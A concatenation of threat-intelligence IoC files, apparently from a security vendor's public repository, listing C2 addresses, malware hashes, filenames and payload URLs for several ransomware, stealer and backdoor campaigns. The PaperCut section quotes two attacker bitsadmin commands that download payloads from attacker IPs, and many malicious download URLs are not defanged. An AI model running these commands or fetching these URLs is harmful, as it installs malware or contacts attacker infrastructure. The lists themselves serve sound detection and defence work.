ip,64.176.50.42,PocoProxy C2, 20 | ip,158.247.241.188,PocoProxy C2, 21 | domain,www.googlespeedtest33.com,PocoProxy C2, 22 | ip,139.180.217.105,PocoProxy C2, 23 | ip,45.130.229.181,Cobalt Strike C2, 24 | ip,185.201.8.187,Cobalt Strike C2, 25 | -------------------------------------------------------------------------------- /crimson_palace_stac1870_bravo.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes,,,, 2 | sha256,92e2dafb6d91ac7bc725e680d53cfbfcc854033d14f6e4807fd0169c605324d2,3.ps1 (PowerShell script),,,, 3 | sha256,DCC938AF8FB2964A1F35ADFB221DE76FFC0BD0CCAAC91455B3638FD4DC33E8C0,EvtxParser.exe (EVTX dump),,,, 4 | sha256,0c3baa012cdb518982ec4ae954b395f3d6b9544ead8e050370219fa584f74f3c,2.vbs (VBS script),,,, 5 | sha256,c679a2453697c51776b8a64d59fb8bf4172906e9a4f91b3872774bd05378d28c,r.vbs (VBS script),,,, 6 | sha256,edd0c859424ab953a92ef20cfc8b938f469253122485915d6de80d314b18b08f,mscorsvc.dll (CCoreDoor),,,, 7 | sha256,55277d86c0707459500dbb16915665ae611d3a4e4597d51599ea8b8fe6f85f29,mscorsvc.dll (CCoreDoor),,,, 8 | sha256,a70e8317a608dd6ea0ad8564b089a153a7e3ab7ef763899d3d806141e820148e,"ntpsapi.dll (signed, benign, ntdll.dll used for EDR unhooking)",,,, 9 | domain,message.ooguy.com,CCoreDoor C2,,,, 10 | ip,146.190.93.250,CCoreDoor C2,,,, 11 | -------------------------------------------------------------------------------- /email account compromise 365 2023-06.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Note 2 | ip,104.161.20.102,used to log into compromised accounts 3 | ip,185.241.149.122,used to log into compromised accounts 4 | ip,20.232.202.245,used to log into compromised accounts 5 | url,botasso.cl,observed in transport rules and Tenant Allow / Block lists 6 | url,smtp83.iad3a.emailsrvr.com,observed in transport rules and Tenant Allow / Block lists 7 | url,continental-database.com,observed in transport rules and Tenant Allow / Block lists 8 | -------------------------------------------------------------------------------- /fleeceware-chatbot-apps.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Note 2 | Description,https://news.sophos.com/en-us/2023/05/17/fleecegpt-mobile-apps-target-ai-curious-to-rake-in-cash,Indicators of fleeceware mobile apps 3 | sha256,2ea59ed7c2cde6b48837cec65a3382d4d257ea18b6604ae5a14b792059acf438,chatgpt.openai.gpt.chat 4 | sha256,ecd044f1e6fa3bf8e1963743e435599b4a74a29d1bfb863bb4fe926aaa05a2c0,com.smartremote.chatgpt 5 | -------------------------------------------------------------------------------- /gootloader_cats_iocs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes 2 | Domain,"hxxps[://]ledabel[.]be/en/are-bengal-cats-legal-in-australia-understanding-the-laws-and-regulations/#:~:text=In%20most%20cases%2C%20you%20do,a%20Bengal%20cat%20in%20Australia",URI in which user clicked on that downloaded the malicious Zip file. 3 | Domain,hxxps[://]www[.]chanderbhushan[.]com/doc[.]php,URI in which the malicious Zip file was observed having connections to. 4 | Domain,hxxps[://]serviciilaser[.]ro/xmlrpc.php,URI in which the malicious .js file was observed having connection to. 5 | ,, 6 | Domain,hxxps[://]metropole[.]com[.]au/xmlrpc.php,URI in which the malicious .js file was observed having connection to. 7 | ,, 8 | ,, 9 | Domain,hxxps[://]fannisho[.]com/xmlrpc.php,URI in which the malicious .js file was observed having connection to. 10 | ,, 11 | ,, 12 | Domain,hxxps[://]gobranded[.]com/xmlrpc.php,URI in which the malicious .js file was observed having connection to. 13 | Domain,hxxps[://]climatehero[.]me/xmlrpc.php,URI in which the malicious .js file was observed having connection to. 14 | ,, 15 | Domain,hxxps[://]wyantgroup[.]com/xmlrpc.php,URI in which the malicious .js file was observed having connection to. 16 | ,, 17 | Domain,hxxps[://]rkbaienfurt[.]de/xmlrpc.php,URI in which the malicious .js file was observed having connection to. 18 | ,, 19 | Domain,hxxps[://]beezzly[.]com/xmlrpc.php,URI in which the malicious .js file was observed having connection to. 20 | ,, 21 | Domain,hxxps[://]playyourbeat[.]com/xmlrpc.php,URI in which the malicious .js file was observed having connection to. 22 | ,, 23 | Domain,hxxps[://]wowart[.]vn/xmlrpc.php,URI in which the malicious .js file was observed having connection to. 24 | ,, 25 | File,Are_bengal_cats_legal_in_australia_33924.zip,Malicious Zip file that was downloaded from the URI users clicked on. 26 | ,SHA256: 435f48667b32c3ab8bb806a8783c0fc40af86e6c5cbf6f621d6e1a3f331483ed, 27 | File,Are_bengal_cats_legal_in_australia_33924.js,The smaller JavaScript file extracted from Are_bengal_cats_legal_in_australia_33924.zip. Note the numerical number differs per extraction. 28 | ,SHA256: ea781eef1da03ea2c3b5250ce26b00445d8a5123bbb0575c583211cca53c61db, 29 | ,, 30 | File,Rehabilitation Services.js,Heavily obfuscated larger JavaScript observed in association to the Scheduled task. This naming also differs per execution of the payload. 31 | ,SHA256: 9a7e79d4ff235feb12672979dfc073d2b4572233772ae500ef6b69c670a9820e, 32 | File,Huthwaite SPIN selling.dat,The name will vary upon execution 33 | File,Small Units Tactics.js,The name will vary upon execution 34 | ,SHA256: 5f2c97499943878d853332da541138bd6ccbafca7e00d6f90d06545b27b66ca3, 35 | Scheduled Task,Destination Branding,The name will vary upon execution -------------------------------------------------------------------------------- /malware-MyKings-domains: -------------------------------------------------------------------------------- 1 | 03264.5b6b7b.ru 2 | 032down.f4321y.com 3 | 032down.mykings.pw 4 | 032down.mys2016.info 5 | 032down.mysking.info 6 | 032js.f4321y.com 7 | 032js.mykings.top 8 | 032look.gamesoxalic.com 9 | 032u.f321y.com 10 | 032up.f4321y.com 11 | 032up.mykings.pw 12 | 032wmi.1217bye.host 13 | 032wmi.oo000oo.club 14 | 032www.mykings.pw 15 | 032www.wmi.oo000oo.club 16 | 032xmr.5b6b7b.ru 17 | 1217bye.host 18 | 1226bye.xyz 19 | 1down.mysking.info 20 | 2.b5w91.com 21 | 2e68a4e1c6.pw 22 | 5b6b7b.ru 23 | 5b6b7b.rujs.5b6b7b.ru 24 | 64.5b6b7b.ru 25 | 795267de78.pw 26 | access.mys2016.info 27 | acpananma.com 28 | ae161719e7.pw 29 | aodr.tnaf.mys2016.info 30 | autodiscover.y17t36.mys2016.info 31 | b5w91.com 32 | bakafohnheey.mys2016.info 33 | catsmeowalot.com 34 | cc.rarxmr.5b6b7b.ru 35 | cianjur-liker.mys2016.info 36 | ciyawitavu9.mys2016.info 37 | cnc.f321y.com 38 | cnc.f4321y.com 39 | color.mys2016.info 40 | cpanel.acpananma.com 41 | cpanel.bokepkitasemua.n.mys2016.info 42 | docs.5b6b7b.ru 43 | down.5b6b7b.ru 44 | down.down0116.info 45 | down.f321y.com 46 | down.f4321y.com 47 | down.my0115.ru 48 | down.mykings.pw 49 | down.mys2016.info 50 | down.mys206.info 51 | down.mysking.info 52 | down.oo000oo.club 53 | down0116.info 54 | down2.b5w91.com 55 | duniagamees.mys2016.info 56 | dwon.f321y.com 57 | f321y.com 58 | f4321y.com 59 | fisica.mys2016.info 60 | fra.gamesoxalic.com 61 | ftp.1226bye.xyz 62 | ftp.ftp0930.host 63 | ftp.oo000oo.mewmi.mykings.top 64 | ftp.oo000oo.mewmi.oo000oo.clubdown.oo000oo.club 65 | ftp.ruisgood.ru 66 | ftp0930.host 67 | gamesoxalic.com 68 | gemsku18.mys2016.info 69 | gvk2016.ru 70 | hadiah.mys2016.info 71 | img4.mys2016.info 72 | jobber.gamesoxalic.com 73 | js.1226bye.xyz 74 | js.5b6b7b.ru 75 | js.5b6b7b.ru 76 | js.f4321y.com 77 | js.ftp0930.host 78 | js.my0115.ru 79 | js.mykings.pw 80 | js.mykings.top 81 | js.mys2016.info 82 | js.oo000oo.club 83 | kr1s.ru 84 | kriso.ru 85 | lmconf.mys2016.info 86 | look.gamesoxalic.com 87 | mail.acpananma.com 88 | mail.catsmeowalot.com 89 | mail.neweventpubgm.mys2016.info 90 | massage.gamesoxalic.com 91 | mewmi.mykings.top 92 | mitiorit.mys2016.info 93 | ms1128.site 94 | my0115.ru 95 | mykings.pw 96 | mykings.top 97 | mys2016.info 98 | mysking.info 99 | nb.ruisgood.ru 100 | nb1.ruisgood.ru 101 | ndown.mykings.pw 102 | never.mys2016.info 103 | ns1.catsmeowalot.com 104 | ns2.catsmeowalot.com 105 | nup.mykings.pw 106 | o5e9x4q.votiima.mys2016.info 107 | oil.mys2016.info 108 | oo000oo.club 109 | own.mykings.pw 110 | own.mys2016.info 111 | p.mykings.pw 112 | rucop.ru 113 | ruisgood.ru 114 | rza.electroshield.ru 115 | scene.mys2016.info 116 | teksten.mys2016.info 117 | tp.ftp0930.host 118 | u.f321y.com 119 | up.f4321y.com 120 | up.ms1128.site 121 | up.mykings.pw 122 | ups.mykings.pw 123 | wap.mys2016.info 124 | webdisk.acpananma.com 125 | webmail.acpananma.com 126 | webmail.aku.n.mys2016.info 127 | wmi.1217bye.host 128 | wmi.my0115.ru 129 | wmi.mykings.top 130 | wmi.oo000oo.club 131 | wn.mykings.pw 132 | x4v2h4q.kaktakoi.mys2016.info 133 | xl.mys2016.info 134 | xmr.5b6b7b.ru 135 | xmr.xmr5b.ru 136 | xmr5b.ru 137 | y16t05.mys2016.info 138 | y16t26.mys2016.info 139 | -------------------------------------------------------------------------------- /ms-msdt restore registry key.reg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sophoslabs/IoCs/4b06149929305d1431a425d2b271a0e04f855f4a/ms-msdt restore registry key.reg -------------------------------------------------------------------------------- /papercut-nday-indicators-of-compromise.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,https://news.sophos.com/en-us/2023/04/27/increased-exploitation-of-papercut-drawing-blood-around-the-internet/,"IoCs for PaperCut attack campaign, April 2023" 3 | sha256,0ce7c6369c024d497851a482e011ef1528ad270e83995d52213276edbe71403f,Cobalt Strike DLL 4 | sha256,38d2f150616fa1b2a989a3b97edf07bf13948441f49709f8c2605b0e3d881b44,"Coin miner, TOR communication" 5 | ip,192.184.35.216,Psychz Networks 6 | ip,216.122.175.114,Colocation America 7 | ip,137.184.56.77,Digital Ocean 8 | ip,45.159.248.244,STARK-INDUSTRIES.SOLUTIONS 9 | ip,185.254.37.173,Serverion 10 | ip,185.254.37.236, 11 | ip,23.184.48.17, IncogNet LLC 12 | url,upd488.windowservicecemter.com/download/setup.msi,Atera Agent 13 | url,study.abroad.ge:443/wp-content/stuff/winlogon.bin,Cobalt Strike C2 connection 14 | url,upd488.windowservicecemter.com,C2 15 | url,upd488.windowservicecemter.com/download/a2.msi,Atera Agent 16 | url,upd488.windowservicecemter.com/download/a3.msi , 17 | url,upd488.windowservicecemter.com/download/AppPrint.msi,Synchro MSP 18 | url,tmpfiles.org/dl/1337855/enc.txt,Ransomware Download 19 | url,50.19.48.59:82/me1.bat,Coin miner script 20 | url,137.184.56.77:443/for.ps1, 21 | url,137.184.56.77:443/c.bat, 22 | url,4.tcp.ngrok.io:14573,Ngrok (Ingress as a service secure app tunnel) 23 | url,45.159.248.244:8000/wow,Stark Industries 24 | url,159.65.42.223/r/ppc/02E663CA8C405746/,Digital Ocean 25 | url,185.254.37.173:443/8a293f2ddb634472a3e8b1ede4e81577.Php?,Serverion 26 | url,185.254.37.236/ppc,Serverion 27 | domain,upd343.winserverupdates.com,Cloudflare hosted C2 28 | domain,ber6vjyb.com,Truebot C2 29 | url,http://192.184.35.216:443/4591187629.exe,Downloads coin miner (bitsadmin /transfer mydownloadjob /download /priority normal http://192.184.35.216:443/4591187629.exe %WINDIR%setup2.exe) 30 | url,http://23.184.48.17/bootcamp.zip,DWAgent (bitsadmin /transfer dwa /download /priority FOREGROUND http://23.184.48.17/bootcamp.zip C:\ProgramData\bootcamp.zip) 31 | domain,cdn-backdl.com,C2 for NetSupport Download 32 | domain,Jojojovan1.com,NetSupport C2 33 | domain,Jojojovan2.com,NetSupport C2 34 | sha256,1097975f1dede47a8ef80bab26c6fed7e3db70f033ad86ec77567351379dadd3,upd488.windowservicecemter.com/download/a2.msi 35 | sha256,00ec44df6487faf9949cebee179bafe8377ca4417736766932508f94da0f35fe,upd488.windowservicecemter.com/download/AppPrint.msi 36 | sha256,d8d49f34f57ce54da60a0d2edf8c7924525b1dd1dcccdead18273a97282ffa94,upd488.windowservicecemter.com/download/a3.msi 37 | sha256,f9947c5763542b3119788923977153ff8ca807a2e535e6ab28fc42641983aabb,upd488.windowservicecemter.com/download/setup.msi 38 | sha256,0ce7c6369c024d497851a482e011ef1528ad270e83995d52213276edbe71403f,upd488.windowservicecemter.com/download/update.dll 39 | sha256,582b72bb0f0088aaad17f3aeab98654ede6fed18b5c7f48c1a593e4ec0076a4d ,bootcamp.zip file 40 | sha256,3b326a3e4f0a03db859feeed7e4e3a832acdaeaf8b2cd69ecc0dce73c1a225c9 ,me1.bat 41 | sha256,45729491ec4ae2065672e6d93a3aa7533a8058cecb8fcdb79ecd5d10cfa2aeca ,me2.bat 42 | sha256,487d47985cddf204a94cfd41bd2d89798cdc03c4df8a582ecfe885eeb374a8ae ,winlogon.bat 43 | -------------------------------------------------------------------------------- /raccoonstealer.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,Indicators from https://news.sophos.com/en-us/2021/08/03/trash-panda-as-a-service-raccoon-stealer-steals-cookies-cryptocoins-and-more/, 3 | sha256,be351f0654045ac95d35f21dc94576adfcd8ee976f48f430db9be75569cd95f8, 4 | sha256,71f97ec74c9d00a4c22c2905692dd1933c0ec86afa8fe7800fcb06a92fc933ee, 5 | sha256,f15ec4e938667248ae7ec3f0c754bafa8b1978cd5ee043755854783d78d06ab9, 6 | sha256,1935d92f1fbc8a6ef85e72c7b25d80dabe8ea7db42c42446a3c01076c3aad750, 7 | sha256,38b605f9fac77ac0bf9b13067a13fe02ac76ebee5fbd11a0e0ca869f268a6b3c, 8 | sha256,5caffdc76a562e098c471feaede5693f9ead92d5c6c10fb3951dd1fa6c12d21d, 9 | sha256,14c7bec7369d4175c6d92554b033862b3847ff98a04dfebdf9f5bb30180ed13e, 10 | sha256,5caffdc76a562e098c471feaede5693f9ead92d5c6c10fb3951dd1fa6c12d21d, 11 | sha256,e10a97b02915dc3b2962603b9d173043906c4ecb865c7a8a64c6dcee66d30967, 12 | sha256,ea50f0afe88df5256b2f596b8ecde1f12779f496cd9a7d482d2182d6f789a57f, 13 | sha256,d9bb8e2ccfb5f98ca1097224493dc4f166291ee7b11fd13eaf9d0ef3cd379807, 14 | sha256,e950dd74f002df712925abe0c8ed18cc0cf38c53e5cb57eb68610e00da14c0f3, 15 | domain,cheapdealnow.top, 16 | domain,f0473248.xsph.ru, 17 | domain,xsph.ru, 18 | domain,bbhmnn778.fun, 19 | domain,telete.in/jbitchsucks, 20 | ip,88.99.66.31, 21 | path,/gate/log.php, 22 | path,/gate/sqlite3.dll, 23 | path,/gate/libs.zip, 24 | url,f0473248.xsph.ru/ApplicationFrameHost.exe, 25 | -------------------------------------------------------------------------------- /ransomware_atomsilo.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note,, 2 | filename,mfc.ini,WMIexec-style Backdoor (Cobalt Strike Beacon),, 3 | file_path_name,C:\Windows\debug\mfc.ini,WMIexec-style Backdoor (Cobalt Strike Beacon),, 4 | sha256,7335dddffe5d932f57752f9bafd7e57aaf2a9be1b9fa29f549e4e36d9b9dc876,WMIexec-style Backdoor (Cobalt Strike Beacon),, 5 | sha256,233e5fb47b9046c14732d0d777096ac3704352c7ee68dab66dea1f5a4a1c81df,Troj/Agent-BHUN,, 6 | sha256,d3a2d4ba16add4a2c961fc907355ac994dceedd4fb56aa1bc2d76b9bdef77bd8,ATK/KDUtil-A,, 7 | filename,autologin.sys,Troj/KillAV-IT,, 8 | file_path_name,C:\windows\temp\autologin.sys,Troj/KillAV-IT,, 9 | sha256,c232b3d1ea2273b8ad827724c511d032cda7f2c66567638abf922a5d5287e388,Troj/KillAV-IT,, 10 | filename,2.exe,Troj/ProcKill-F,, 11 | sha256,1ec631ff331f3177fb8f8da635f789ef02b90cc4ec0abf9d0122e0bc2b400151,Troj/ProcKill-F,, 12 | filename,FuckGPO.exe,Mal/DotNet-L,, 13 | sha256,3abcf9ab068be27ffce12bbbb9b5cd161a1beb312e639e72242f60bb6df9bc8a,Mal/DotNet-L,, 14 | filename,autoupdate.exe,Troj/Ransom-GKL,, 15 | sha256,5fa490668a9963e97d956f9a3b0c746b1d16eee9a73dfba875c9a3dc0e2c0d1b,Troj/Ransom-GKL,, 16 | filename,autologin.exe,ATK/KDUtil-A,, 17 | sha256,7b7b967a0f3de70c84f0f318de6f2c6382ebc4f4037e0c1b5f6c3155c263efe7,ATK/KDUtil-A,, 18 | sha256,eca9fac6848545ff9386176773810f96323feff0d575c4b6e1c55f8db842e7fe,AppC/Rclone-A,, 19 | filename,zy.exe,AppC/Rclone-A,, 20 | ip,27.1.1.34 ,C2 Atom Silo,, 21 | ip,41.226.2.178 ,C2 Atom Silo,, 22 | ip,213.152.165.29 ,C2 Atom Silo,, 23 | ip,213.152.165.30,C2 Atom Silo,, 24 | url,https://pastebin.com/raw/iL4qbi4S,Coinminer C2,, 25 | url,https://update.ajaxrenew.com:80/functionalStatus/VDcrCtBuGm8dime2C5zQ3EHbRE156AkpMu6W?_=BMJGPDBAJFIKGNADKCNLFGFHFPDGKPCBJDIPDMHOGDPCDEDMDGFPDCOPLDIJOEFLOPLKEFKEFGOEMAJGKCDGNNGDGAICEHKJPOJMPGHAHAJNCPMKCPPHOIOCLIIPJNLPMKEIEMFADHKEOHALNBPNLFFCLOMFKJOLGJFHKGALKPAKKJIDIBEJDHFMKPMMCNPBLDGICIIFJBDLGBMKLLLDHJAJIMMNNLGCPCKCBLOCDKJMGHCCCFGPMIEKLMEBFLBK,C2 Atom Silo,, 26 | domain,update.ajaxrenew.com,C2 Atom Silo,, 27 | url,http://27.1.1.34:8080/docs/s/wi.txt,XMRig miner installer (Troj/BatDl-GE),, 28 | url,http://222.122.47.27:2143/auth/xmrig.exe,XMrRig miner download URL,, 29 | url,http://139.180.184.147:45532/fake.php,C2 Atom Silo,, -------------------------------------------------------------------------------- /ransomware_memento.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Notes 2 | filename,main.exe,Memento team ransomware 3 | sha256,7793b3b3545da61a7a073e64ac22c60fa38df8fbf0bbc95721a814992857c67a,Memento team ransomware variant 4 | sha256,48c6d499618d81280f7aa3acf6aecc2f37983f527f4a729b133ae6fca20ec8c7,Memento team ransomware variant 5 | sha256,91854f69ae78f5b5627c9e8800a1e5ef6f56b47a0193f03e260e362905770052,Memento encryption filter 6 | filename,filter.txt,Memento team ransomware variant 7 | filename,r.exe,WinRAR copy 8 | sha256,07e1e386d8ffcc5b5ef1e55d6fb31a210522e2d9f1955dc24ba5c43523813612,WinRAR copy 9 | filename,config.key,Public key for Memento encryption 10 | filename,RuntimeBroker.exe,Memento team ransomware variant 11 | sha256,6a4729fc8fc796318b44841e322c1f3bee37b2737e359e5e5b777d8855b370a6,Memento team ransomware variant 12 | sha256,09a0caadc4df3d4278368f94f52007894c2b51d3785d985cb8e42646e8a33b68,Memento team ransomware variant 13 | filename,RuntimeScheduler.exe,Memento team ransomware variant 14 | filename,kbview.bat,Batch file for deployment of keylogger 15 | filename,wincert.bat,Persistent C2 batch file 16 | sha256,ca57391cdbac224f159e858425d231d068aa76316e0345cb8d58c716b9eff587,Plink SSH connector 17 | filename,pl.exe,Plink SSH connector 18 | filename,plin.exe,Plink SSH connector 19 | filename,BCWipeTM.exe,BestCrypt Wipe utility 20 | sha256,3037956db905355f66cbd02ad9778f86551b0c34f386ee0adb7c2feb941a0e30,BestCrypt Wipe utility 21 | filename,BCShExt.dll,BestCrypt shell extension 22 | sha256,e9a096c886ce42c2dec0fae1492c2943a2e321fcff2a5697d1689ff146f4b4b6,BestCrypt shell extension 23 | sha256,654ad61bc4de2b9ad07add2dc7a6de22d24436f699bdb7923c7f510ee67b7e0a,BestCrypt shell extension 24 | filename,BCWipeSvc.exe,BestCrypt Wipe utility 25 | sha256,952476a3ead7a97ff9c4906a2801ad993e4850a3e10c4350bbd44ab2eeabbb02,BestCrypt Wipe utility 26 | filename,bcupdt.exe,BestCrypt Updater 27 | sha256,ceec3cbb3a97c6be2c0446fcd74134ab8feec66f985bc50f17fb41350494c6ef,BestCrypt Updater 28 | filename,bcview.exe,Part of BCWipe utilty 29 | sha256,1a186d51bb4e4fd18acad387b2872d164e3a772e935b26c9fc673fdf53ccb533,Part of BCWipe utilty 30 | filename,bcwipe.exe,BestCrypt Wipe utility 31 | sha256,8327eb8465d62959a40ea487c0fd0da178a8857e4b49a1594c5a2df3631ca179,BestCrypt Wipe utility 32 | filename,bcwipegui.exe,BestCrypt Wipe utility 33 | sha256,0bd68bd1e4567f15bc81c31d37971a71fc870781acb4cab0f51c675dcd779b5b,BestCrypt Wipe utility 34 | filename,insbcbus.exe,BestCrypt Wipe utility 35 | sha256,d415ac7805edf8d634fbe6ac913e1e53a0d2ea0fce5146e0054056458a2a8f96,BestCrypt Wipe utility 36 | filename,logview.exe,Jetico Log Viewer 37 | sha256,cd7c9f1bd77e304a913758e95597d96399f823d887d7787fd8e9d8ec7a921d38,Jetico Log Viewer 38 | filename,taskeng.exe,keylogger 39 | sha256,e54d9a45850786f52b8169eceb1be0a4e21d5d000b933dda470b00d17c8fb169,keylogger 40 | filename,mimikatz.exe,Mimikatz credential stealer 41 | sha256,31eb1de7e840a342fd468e558e5ab627bcb4c542a8fe01aec4d5ba01d539a0fc,Mimikatz credential stealer 42 | filename,secretsdump.exe,secretsdump.py compiled hash stealer 43 | sha256,c3405d9c9d593d75d773c0615254e69d0362954384058ee970a3ec0944519c37, 44 | filename,wmiexec.exe,WMIexec backdoor 45 | sha256,14f0c4ce32821a7d25ea5e016ea26067d6615e3336c3baa854ea37a290a462a8,WMIexec backdoor 46 | filename,nm.exe,NMAP 47 | sha256,14f0c4ce32821a7d25ea5e016ea26067d6615e3336c3baa854ea37a290a462a8,NMAP 48 | filename,tmp5FE0.tmp.exe,BitCoinMiner 49 | sha256,3bed84f229f5e8ca22c3768a7430ceb5e6e9ecb611df55691f07039e618f265b,BitCoinMiner 50 | filename,npcap-0.93.exe,NMAP PCAP driver installer 51 | sha256,c3757e7f49bd40012ef9cd320568c401bad1ba1843a4055b11bebc2f10bd83ca,NMAP 52 | filename,TxR.exe,Memento dropper for SSH reverse shell and web exfiltration 53 | sha256,1767cb41af0bbedf8554c5ddf7968cc1e039a06b7e4b7f9cd42ed4dd301bf02f,Memento dropper for SSH reverse shell and web exfiltration 54 | filename,nssm.zip,Non-Sucking Service Manager install payload 55 | filename,config.json,XMRIg configuration file 56 | filename,peview.exe,Process Hacker PE viewer 57 | filename,ProcessHacker.exe,Process Haclker 58 | filename,GoogleChangeManagement.xml,Persistent SSH reverse shell configuration file 59 | filename,MicrosoftOutLookUpdater.bat,Persistent SSH reverse shell batch file 60 | filename,MicrosoftOutLookUpdater.exe,Plink SSH connector 61 | filename,MicrosoftOutlookUpdateSchedule.xml,Persistent SSH reverse shell configuration file 62 | ip,78.138.105.150,Memento ransomware callhome 63 | ip,183.110.224.164,compromised site used for remote PowerShell 64 | ip,27.102.66.114,SSH connection 65 | ip,123.45.67.89,keylogger download 66 | ip,169.51.60.221,Source of file loaded to memory by malicious PowerShell 67 | ip,27.102.127.120,SSH connection 68 | ip,45.77.76.158:25643,Remote script source for BitCoinMiner 69 | ip,190.144.115.54:443,remote script source for XMR miner 70 | ip,195.201.124.214:10001,Mimu XMR miner callhome 71 | url,hxxp://78.138.105.150:11180/sv.php,Memento Ransomware C2 address 72 | domain,checkvisa.xyz,remote PowerShell 73 | domain,novelengine. com,compromised site used for remote PowerShell 74 | url,https://google.onedriver-srv.ml/gadfTs55sghsSSS,Callhome for exfiltration 75 | url,169.51.60.221:1331/en-us/docs.html?type=&v=1,source for remote script executing XMRig miner 76 | url,27.102.127.120/r.exe,remote copy of WinRAR 77 | url,hxxp://45.77.76.158:25643/w,Remote script source for BitCoinMiner 78 | domain,google.onedriver-srv.ml,SSH reverse shell and web exfil host 79 | url,transfer.sh/cnPW0x/Connector3.exe,Backdoor download location 80 | url,hxxp://190.144.115.54:443/mine.bat,miner remote script 81 | url,hxxp://27.102.127.120/x1.rar,Memento tool remote archive 82 | url,hxxp://27.102.127.120/x2.rar,Memento tool remote archive 83 | url,hxxp://27.102.127.120/r.exe,Memento tool download 84 | url,hxxp://lurchmath.org/wordpress-temp/wp-content/plugins/xmrig.zip,XMRIg remote archive 85 | url,hxxps://raw.githubusercontent.com/c3pool/xmrig_setup/master/xmrig.zip,XMRig remote archive 86 | -------------------------------------------------------------------------------- /repository-backdoor-IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes 2 | Description,IOCs related to backdoored repository campaign,https://news.sophos.com/en-us/2025/06/04/the-strange-tale-of-ischhfd83-when-cybercriminals-eat-their-own 3 | url,https://rlim.com/pred-FMoss/raw,Intermediate payload 4 | url,https://paste.fo/raw/e79fba4f734e,Intermediate payload 5 | url,https://pastejustit.com/raw/16qsebqoqq,Intermediate payload 6 | url,https://rlim.com/seraswodinsx/raw,Intermediate payload 7 | url,https://popcorn-soft.glitch.me/popcornsoft.me,Intermediate payload 8 | url,https://pastebin.com/raw/LC0H4rhJ,Intermediate payload 9 | url,https://pastejustit.com/raw/tfauzc15xj,Intermediate payload 10 | url,https://rlim.com/drone-SJ/raw,Intermediate payload 11 | url,https://paste.fo/raw/6c2389ad15f1,Intermediate payload 12 | url,https://pastebin.com/raw/ZTrwn94g,Intermediate payload 13 | url,https://pastejustit.com/raw/zhpwe7mrif,Intermediate payload 14 | url,https://pastebin.com/Jet0TFpK,Intermediate payload 15 | domain,https://556d807df8c8a5fe567f66701b2ce4a5.arturshi.ru/tg/webhook/86703,C2 16 | url,https://github.com/unheard44/fluid_bean/releases/download/releases/SearchFilter.7z,Repository hosting malware 17 | filename,SearchFilter.7z,Malware 18 | filename,antiDebug.ps1,Evasion script 19 | filename,disabledefender.ps1,Evasion script 20 | filename,disabledefenderv2.ps1,Evasion script 21 | sha256,577c1e288b1d7ef69330a86f0c14d06bb67980fba64896aadf556f52b770cf56,SearchFilter.7z 22 | sha256,f062c7884844da7535cb7b4e7e0a517856022fbd410eb62ecf661fded2c473bc,SearchFilter.exe 23 | sha256,bcca9de329754c6719b4829919dcb0603f8a5c29a36ab83f9d88a5aa2d00e2d6,app.asar 24 | sha256,77a5d2b1fa0660f307bfe34294ff612556418685c87fead07e00c43721609a2e ,liberarComSMS.js 25 | sha256,823da5ffec1b9eed87301fc4685009e4673d72a47e1acec4baeee6df27634d51,linea.js 26 | sha256,a53ac7466290c9f1e92f8c953d3068f7e72df2929972aa8d4a31a2485009862c,AnyDesk Exploit.vbproj 27 | sha256,cb1617e2ffbf07f9e897beddf8565965e881d4b4f45dda9ba30f5e1304d8ec11,Apex Legends External Cheat.vcxproj 28 | sha256,4f1f9a9e7f3457f7b67dbe899781d81b616c3ec57b08230cb4bcb9279c87d9c2,Apex Legends Internal Cheat.vcxproj 29 | sha256,12f1e6fadf3e9ba2d1feef21d3c852a1d56922b934096247d4b3df54df5af6ec,Aviator-Hack.csproj 30 | sha256,9ef04f50bc95f9a20c09c636f2783e5cefc8b31c8938ba2ed6b9d92d838f4b07,Aviator-Hack.csproj 31 | sha256,585a9fc16ab2739d9db390004272c3c26817f7d548ff4a9a3a6d3d992a14dc87,COD Warzone-2 Cheat.vcxproj 32 | sha256,23eda28b82baac326c5878b67510e453603e68e3dfa5dfabd92b145cf95a3e76,CS2External.vcxproj 33 | sha256,03e1ad603d31b6b116ce0f459986791eb661d5245f9b52e278cd005ec3e081a4,DayZ Cheat.vcxproj 34 | sha256,95be742a617e91d276956b95419667b442f68d43145f6d7ffe70581b4b5b5587,DLL Injector V4.vcxproj 35 | sha256,5d89d66fb5f1410c0ef745fecb286608db4bff9aedc68a8de3b5fb37c1c0f0e8,EFT-External-Cheat.vcxproj 36 | sha256,9cf5bece2cb9b43686cc0241883bd1932c8dc06e92e29b0e210e9f00e0ef2962,FiveM-External.vcxproj 37 | sha256,2b13b1b778356d779abcef5fa6150da9cba9520231a0775218bf6c7b466327dc,FiveM.vcxproj 38 | sha256,918796b8cc63f91baf22cb1ec8cf8078df36c81dcaadc1428a261ea793ac71b5,Hwid Spoofer.csproj 39 | sha256,8a6237ac9a90914d96490865d784a2d712ad3d3361a3d50893d33b75b865fbb5,Injector.vcxproj 40 | sha256,44d365d47a1f8d103795b7dc25f57068922fe8e0af1887066162c763c1b9f402 ,injector.vcxproj 41 | sha256,9f34a4db19d67d898420a131c6f31ba0815b009ac82a2a9925eaa07ad687eb0f,Injector.vcxproj 42 | sha256,22c5058c274b1f535a6c78c32b42ead9c79bfc1adfb3beb8ee9275fc5006e0e2,LNK Exploit MONSTERMC.vbproj 43 | sha256,668a338ccb320200dcf4c090a01f372ea49f11cbb83946f5ea893e4c2e3caa57,PUBG External.vcxproj 44 | sha256,e330638bc8c23e8b3d87ffc9615bbfc43bc8b37cfbd317e0e86ab456d5e044f9,PUBG.vcxproj 45 | sha256,e5b4ce9a84826170d613562ecf86df4e1d3aee36d7b78ff7e4fa468f7e5ce1ee,Server.csproj 46 | sha256,180c20e039a427f3154271e2a7a620f6c5b59a81c699758b4c1e7e4eae95c08f,Valorant Plus.vcxproj 47 | sha256,89f12803ce3ec782cd912e524a4725ade4ccf45f72dd3f47b8923bebe4464553,WinRAR Exploit.csproj 48 | sha256,424e91a5657753b8d0c45a096f74f59b97f626017e9b2a3a2bff4f543e80edcc,XWorm.csproj 49 | 